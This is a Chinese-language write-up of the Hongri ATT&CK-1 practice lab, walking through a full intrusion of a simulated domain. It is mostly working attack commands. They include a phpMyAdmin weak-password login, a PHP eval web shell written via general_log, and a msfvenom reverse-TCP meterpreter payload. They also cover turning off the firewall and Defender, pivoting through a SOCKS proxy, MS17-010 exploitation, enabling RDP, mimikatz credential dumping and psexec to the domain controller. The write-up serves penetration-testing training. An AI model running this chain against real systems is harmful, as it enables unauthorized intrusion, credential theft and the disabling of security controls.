红日靶场ATT&CK-1

0x01环境搭建

  • 下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
  • 准备一台kali、win7、win3、win2008
  • 密码均为:hongrisec@2019
  • win3使用GOD用户登陆,自行修改密码
  • win7环境配置先开启进入,C:\phpStudy\Apache\bin目录下cmd分别执行httpd.exe -k install 和 httpd.exe -k -n apache2.4,再去服务开启apache服务
  • win7还要开启数据库,C:\phpStudy\MySQL\bin目录下cmd执行mysqld –defaults-file=”C:/phpStudy/mysql/my.ini” –console –skip-grant-tables,记得备份快照

配置如下:

0x02信息搜集

kali攻击机进行内网探测,锁定目标

arp-scan [kali的IP-C段]
arp-scan -l

探测后发现开启了80端口和3306端口,访问80端口

nmap -sS -P0 -sV -O [ip]
nmap --min-rate 10000 -p- [ip]

拿到了网站根目录

使用dirsearch或者dirb目录扫描,发现存在phpmyadmin

dirsearch -u [http://ip]
dirb [http://ip]

0x03漏洞利用

因为这里是模拟内网,我们直接尝试弱口令root/root,admin/admin进行登陆

查找有用信息,来到SQL查询页面,看看可不可以上传文件或者日志上传

SHOW GLOBAL VARIABLES LIKE "%secure%";
SHOW GLOBAL VARIABLES LIKE "%general%";

尝试改上传无果,但是可将日志开启

SET GLOBAL general_log = ON;
SET GLOBAL general_log_file = 'C:\\phpStudy\\WWW\\test.php';

我们先上传一个小马,访问这个目录执行命令

select '<?php eval($_POST[1]);?>';

后续再关了上传
set global general_log=off;

蚁剑连接,成功上传了webshell

下一步我们用msf生成大马或者CS生成反弹shell拿到这台DMZ主机权限,这里用msf展示

msfconsole
use exploit/multi/handler
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.130 LPORT=9999 -f exe > shell.exe
set payload windows/meterpreter/reverse_tcp
set LHOST [kali IP]
set LPORT [端口]
run

成功拿取shell

0x04内网搜集

关闭防火墙和windefend

getuid
shell   切换会话模式
chcp 65001
netsh advfirewall set allprofiles state off  关闭防火墙
net stop WinDefend   关闭windefend  【注意大小写否则关闭不成功】

发现存在域环境和另外一个内网网段

ipconfig /all

进一步确定是否为域环境,确定是域环境开始对其内网进行信息搜索

net view 
net view /domain

net group "domain controllers" /domain   找域控的主机名
ping god.org   找内网ip网段
net group "domain admins" /domain  找域控管理员名字

利用msf模块搜集内网网段

run get_local_subnets
搜集内网网段

run post/multi/manage/autoroute
建立路由

run autoroute -p

保留会话,切换模块换到后渗透模块,发现此域有三台

background  保留会话并退出
use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1
run

对内网的机器进行端口扫描前,先进行内网穿透

use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
run
jobs


vim /etc/proxychains4.conf

扫描端口,均存在445端口,可试试永恒之蓝

proxychains4 nmap -sT -Pn -F 192.168.71.138
proxychains4 nmap -sT -Pn -F 192.168.71.141

0x05横向移动

使用内网穿透启动msf攻击

proxychains4 msfconsole

search ms17_010
每个模块都可以试试我这里先用eternalblue

失败了继续换个模块用,终于成功了,这里会显示三台主机

use auxiliary/admin/smb/ms17_010_command
set RHOST 192.168.52.141
set command "net view"
run

关掉他的防火墙和开启3389

set command "netsh advfirewall set allprofiles state off"  关闭防火墙
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'    开启3389

用pipe,搜集到netlogon这是一个域登录认证

use auxiliary/scanner/smb/pipe_auditor
set RHOST 192.168.52.141
set THREADS 20
run

试试psexec模块,还是没有拿到会话

use exploit/windows/smb/ms17_010_psexec
set NAMEDPIPE netlogon
set RHOST 192.168.52.141
set LOHST 192.168.110.130
run

然后我前前后后发现试了很多永恒之蓝的漏洞都无法建立其他两个主机的后门,才发现是我这里的凭证的位数出了问题

回到原本的win7的shell会话,想用minikataz抓明文发现有问题,这里一定要转到64位进程
load kiwi
ps

终于抓到了域控的密码,不过这里你应该是改过靶机的密码,知道怎么来的就行,后面展示的都是我改过的密码,因为这里是曾经域控登陆过这台win7主机留下的凭证不一定是有效的

migrate 504 转到此进程
load kiwi
creds_all  利用minikataz抓取凭证

一条命令梭哈,拿下域控,等于拿下所有了

proxychains4 psexec \\192.168.52.138 -u administrator -p [你抓的凭证密码] cmd.exe
或
proxychains4 winexe -U administrator%[你抓的凭证密码] //192.168.52.138 "cmd.exe /c chcp 65001 && cmd.exe"

0x06总结

前期浪费太多时间了,关于权限维持和后渗透相关的到下一把靶场再记录吧